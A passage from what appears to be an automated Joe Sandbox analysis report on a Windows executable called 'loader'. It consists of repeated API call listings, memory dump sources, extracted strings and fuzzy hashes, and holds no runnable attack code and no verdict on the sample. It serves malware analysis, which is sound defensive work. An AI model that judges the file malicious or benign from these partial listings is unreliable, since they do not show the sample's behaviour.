              • ExitProcess.KERNEL32 ref: 00110669
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: 14d7348deeab63f6a347f97d4129b7659a24db40a9840f604bb428495418db0b
              • Instruction ID: 29e097ff278b7b3001b53896a420f1eeebc5e01a096ef816b7dea90ebe26a24f
              • Opcode Fuzzy Hash: 14d7348deeab63f6a347f97d4129b7659a24db40a9840f604bb428495418db0b
              • Instruction Fuzzy Hash: ECD195B1508384ABD3359F50DA49BDFBBE8BF84704F40092DF5A9A6140D7B496888F5B

              Control-flow Graph

              APIs
              • __EH_prolog.LIBCMT ref: 0011BDFA
                • Part of subcall function 0011AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0011AAFE
              • SetWindowTextW.USER32(?,?), ref: 0011C127
              • _wcsrchr.LIBVCRUNTIME ref: 0011C2B1
              • GetDlgItem.USER32(?,00000066), ref: 0011C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 0011C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,0014A472), ref: 0011C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0011C335
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: 0ff558473ba4c9e76fc8affa2547db67fb6b6ae02d00f8354b4e361a5bddaf63
              • Instruction ID: ec93689946082c735d36956f66f7e3ad85a37abd4cd83bc9a18701765bd2b5e1
              • Opcode Fuzzy Hash: 0ff558473ba4c9e76fc8affa2547db67fb6b6ae02d00f8354b4e361a5bddaf63
              • Instruction Fuzzy Hash: 1CE17176D44628AADB29DBA0EC85DEF777CAF18311F0041B6F509E3091EB749AC48F90

              Control-flow Graph

              APIs
              • __EH_prolog.LIBCMT ref: 0010D346
              • _wcschr.LIBVCRUNTIME ref: 0010D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0010D328,?), ref: 0010D382
              • __fprintf_l.LIBCMT ref: 0010D873
                • Part of subcall function 0011137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0010B652,00000000,?,?,?,0001040A), ref: 00111396
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: 0715d45a4f2c795f111629b9c8ead9037c22c343a9e5a5a38bb65ae9dd0db22e
              • Instruction ID: 16bc3354b401af9d72877c74a209685fc55c259aaee9d2adf49f08e494fa86d4
              • Opcode Fuzzy Hash: 0715d45a4f2c795f111629b9c8ead9037c22c343a9e5a5a38bb65ae9dd0db22e
              • Instruction Fuzzy Hash: 1E12D2B19002199ADF24EFE4EC92BEEB7B5FF14304F10456AF595A71C1EBB09A44CB24

              Control-flow Graph

              APIs
                • Part of subcall function 0011AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011AC85
                • Part of subcall function 0011AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011AC96
                • Part of subcall function 0011AC74: IsDialogMessageW.USER32(0001040A,?), ref: 0011ACAA
                • Part of subcall function 0011AC74: TranslateMessage.USER32(?), ref: 0011ACB8
                • Part of subcall function 0011AC74: DispatchMessageW.USER32(?), ref: 0011ACC2
              • GetDlgItem.USER32(00000068,0015ECB0), ref: 0011CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0011A632,00000001,?,?,0011AECB,00134F88,0015ECB0), ref: 0011CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0011CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,001335B4), ref: 0011CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0011CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0011CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0011CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0011CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0011CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0011CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,0013431C), ref: 0011CC76
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: 8e8630beb87920b411754a9ed6e3506576f09a51f33bd69eb415f44c25d107cf
              • Instruction ID: 350f8bdb1893ddabd1b27ef66cad6c22ab8bc52f45a4e2f68e1f9399733a09a5
              • Opcode Fuzzy Hash: 8e8630beb87920b411754a9ed6e3506576f09a51f33bd69eb415f44c25d107cf
              • Instruction Fuzzy Hash: E631CF71185B41ABE311DF24DC4AFAF7FACEB82704F000518FA51965E1DBB45988CBB6

              Control-flow Graph

              APIs
              • ShellExecuteExW.SHELL32(?), ref: 0011CF54
              • ShowWindow.USER32(?,00000000), ref: 0011CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 0011CFCF
              • CloseHandle.KERNEL32(?), ref: 0011CFF5
              • ShowWindow.USER32(?,00000001), ref: 0011D084
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: c03fdc9141dba37bb1261e0a8f25962625fc9fc19ec4c265f933cae545652389
              • Instruction ID: 966a5db40c0c9ed0afd1ab033571adc6f927bd0a78b17dbcba40b465614804ea
              • Opcode Fuzzy Hash: c03fdc9141dba37bb1261e0a8f25962625fc9fc19ec4c265f933cae545652389
              • Instruction Fuzzy Hash: D0611670448781AAD7399F24E8006EBBBF6AF85300F04483DF5C597250D7B1D9C6CB92

              Control-flow Graph (function at 0012A058)

              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00124E35,00124E35,?,?,?,0012A2A9,00000001,00000001,3FE85006), ref: 0012A0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0012A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0012A138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0012A232
              • __freea.LIBCMT ref: 0012A23F
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              • __freea.LIBCMT ref: 0012A248
              • __freea.LIBCMT ref: 0012A26D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID: ^PpL
              • API String ID: 1414292761-914357616
              • Opcode ID: 5bb1918b426c0902ab88873ed3657a7df27a9ee9c43e81eaea41c42eb24e6159
              • Instruction ID: 537b1d4381b7db78f505b1f26c3c5f1f09fd1ae17d25fc3b0cdbcba09128c8a6
              • Opcode Fuzzy Hash: 5bb1918b426c0902ab88873ed3657a7df27a9ee9c43e81eaea41c42eb24e6159
              • Instruction Fuzzy Hash: 4D51D172610226EFDB258F64EC41FBB77AAEF50760F954628FC04D6140DB35DC60C6A2

              Control-flow Graph

              APIs
                • Part of subcall function 00110085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
                • Part of subcall function 00110085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              • OleInitialize.OLE32(00000000), ref: 0011A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0011A385
              • SHGetMalloc.SHELL32(00148430), ref: 0011A38F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll$3Ro
              • API String ID: 3498096277-3613677438
              • Opcode ID: 1db87a63ea7bf38f9c289e02686a538afcc003e94b21c1a9fdc10a8943892a42
              • Instruction ID: b236491c87008069545b73bd1341fe72d3d8cb8b2a6b60aa5a061b40eeb5d37d
              • Opcode Fuzzy Hash: 1db87a63ea7bf38f9c289e02686a538afcc003e94b21c1a9fdc10a8943892a42
              • Instruction Fuzzy Hash: 50F0FFB1D00209ABCB10AF99DC499EFFBFCEF95701F00416AF814E2250DBB456458BA1

              Control-flow Graph (function at 001099B0)

              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001078AD,?,00000005,?,00000011), ref: 00109A4C
              • GetLastError.KERNEL32(?,?,001078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00109A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,001078AD,?,00000005,?), ref: 00109A8E
              • GetLastError.KERNEL32(?,?,001078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00109A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00109ADB
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: 1220060f25f5a8ba9c080696e4de80f8a9910c936af6ea8673ed705438b33531
              • Instruction ID: 4cf14850fbbde23d892ab4e0b72c96d98cad523c6e248aa7cdf4942e3406d648
              • Opcode Fuzzy Hash: 1220060f25f5a8ba9c080696e4de80f8a9910c936af6ea8673ed705438b33531
              • Instruction Fuzzy Hash: FF415670A44746AFE3309B20CC06BDABBD4BB05324F100719F9E4975D2E7F5A988CBA5

              Control-flow Graph (function at 0011AC74)

              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011AC96
              • IsDialogMessageW.USER32(0001040A,?), ref: 0011ACAA
              • TranslateMessage.USER32(?), ref: 0011ACB8
              • DispatchMessageW.USER32(?), ref: 0011ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 1b3592dde05c507ef5abf2faadfe777f37d13e3c940aecbcca4756c4a45346ff
              • Instruction ID: 0d9f8d6a6f1918d694ff71c18e524d1703c384bf9cb04901d9ad2175b94acfba
              • Opcode Fuzzy Hash: 1b3592dde05c507ef5abf2faadfe777f37d13e3c940aecbcca4756c4a45346ff
              • Instruction Fuzzy Hash: 0FF01D71902129AB8B209BE19C4CEEF7F6CEF052A17404415F905D2550EB74D485C7F1

              Control-flow Graph (function at 0011A2C7)

              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 0011A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0011A315
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0011A305
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT
              • API String ID: 4243998846-3080729518
              • Opcode ID: 1340ac65683b1c526f8b95e185fdc89e1db8e221a71ef363559cc9c4a2dd488d
              • Instruction ID: fe65b27d527c12ec25399bfb3492ace7acf5689abbb0e7d485c9310784146a62
              • Opcode Fuzzy Hash: 1340ac65683b1c526f8b95e185fdc89e1db8e221a71ef363559cc9c4a2dd488d
              • Instruction Fuzzy Hash: 6DF0E232A4262877E7209A649D09FDB7B6CAF46B40F440062FE04A2180D7B0A981C6F6

              Control-flow Graph (function at 0010984E)

              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 0010985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00109876
              • GetLastError.KERNEL32 ref: 001098A8
              • GetLastError.KERNEL32 ref: 001098C7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 92a27997e267306ec15ac4843e0c5775495ad4d34f3162efcae856880ecdd092
              • Instruction ID: 508b9d2aac7d93bfefb627ac489d4e8c781f481965ec492b6155cf931845f4df
              • Opcode Fuzzy Hash: 92a27997e267306ec15ac4843e0c5775495ad4d34f3162efcae856880ecdd092
              • Instruction Fuzzy Hash: 1111CE3090020CEBDB246B51C824A7977A8FB46731F10C12BF8AA85BC2DBB99E409F51

              Control-flow Graph (function at 0012A4F4)

              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00123713,00000000,00000000,?,0012A49B,00123713,00000000,00000000,00000000,?,0012A698,00000006,FlsSetValue), ref: 0012A526
              • GetLastError.KERNEL32(?,0012A49B,00123713,00000000,00000000,00000000,?,0012A698,00000006,FlsSetValue,00137348,00137350,00000000,00000364,?,00129077), ref: 0012A532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0012A49B,00123713,00000000,00000000,00000000,?,0012A698,00000006,FlsSetValue,00137348,00137350,00000000), ref: 0012A540
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 1f86ec5ba67d8080ef574adfacb6015dd92f7e5cda14e55f67c87fb5a3cc6d27
              • Instruction ID: d9db933bea617330c07eb63604ff51bc5ca28f7415826a86453dd097a3520ca4
              • Opcode Fuzzy Hash: 1f86ec5ba67d8080ef574adfacb6015dd92f7e5cda14e55f67c87fb5a3cc6d27
              • Instruction Fuzzy Hash: C3012632711232AFC7218B68BC44A67BB98EF45BA1B650620F91AD7140D735DA50CAE1
              APIs
                • Part of subcall function 0012AF1B: GetOEMCP.KERNEL32(00000000,?,?,0012B1A5,?), ref: 0012AF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0012B1EA,?,00000000), ref: 0012B3C4
              • GetCPInfo.KERNEL32(00000000,0012B1EA,?,?,?,0012B1EA,?,00000000), ref: 0012B3D7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID: ^PpL
              • API String ID: 546120528-914357616
              • Opcode ID: 123e17c595a26b9232105dc8962f3535e0095218c02e66818bd654887cffbd87
              • Instruction ID: abaf915b3b92ad67956b7f10772c5cb9ba497af4ac084d820405b085cdb73a38
              • Opcode Fuzzy Hash: 123e17c595a26b9232105dc8962f3535e0095218c02e66818bd654887cffbd87
              • Instruction Fuzzy Hash: D7515670D083A59FDB24AF35E8C16BABBE4EF51310F18806ED0978B253D7359952CB80
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0012B019
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Info
              • String ID: $^PpL
              • API String ID: 1807457897-2501119805
              • Opcode ID: e61224b1e52cfa208b48e346c5719a6e06f63427e8565e2c4a0be91ffe68ffc7
              • Instruction ID: c574bc9a6be713c8a03a1d64132de876f6f4e095fc587ed65314a617da0dd3d8
              • Opcode Fuzzy Hash: e61224b1e52cfa208b48e346c5719a6e06f63427e8565e2c4a0be91ffe68ffc7
              • Instruction Fuzzy Hash: CC41277050836C9EDB268A24ACD4AF7BBB9EB05304F1404ECE59A87142D3359A65CF20
              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 0012A4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0012A4C5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
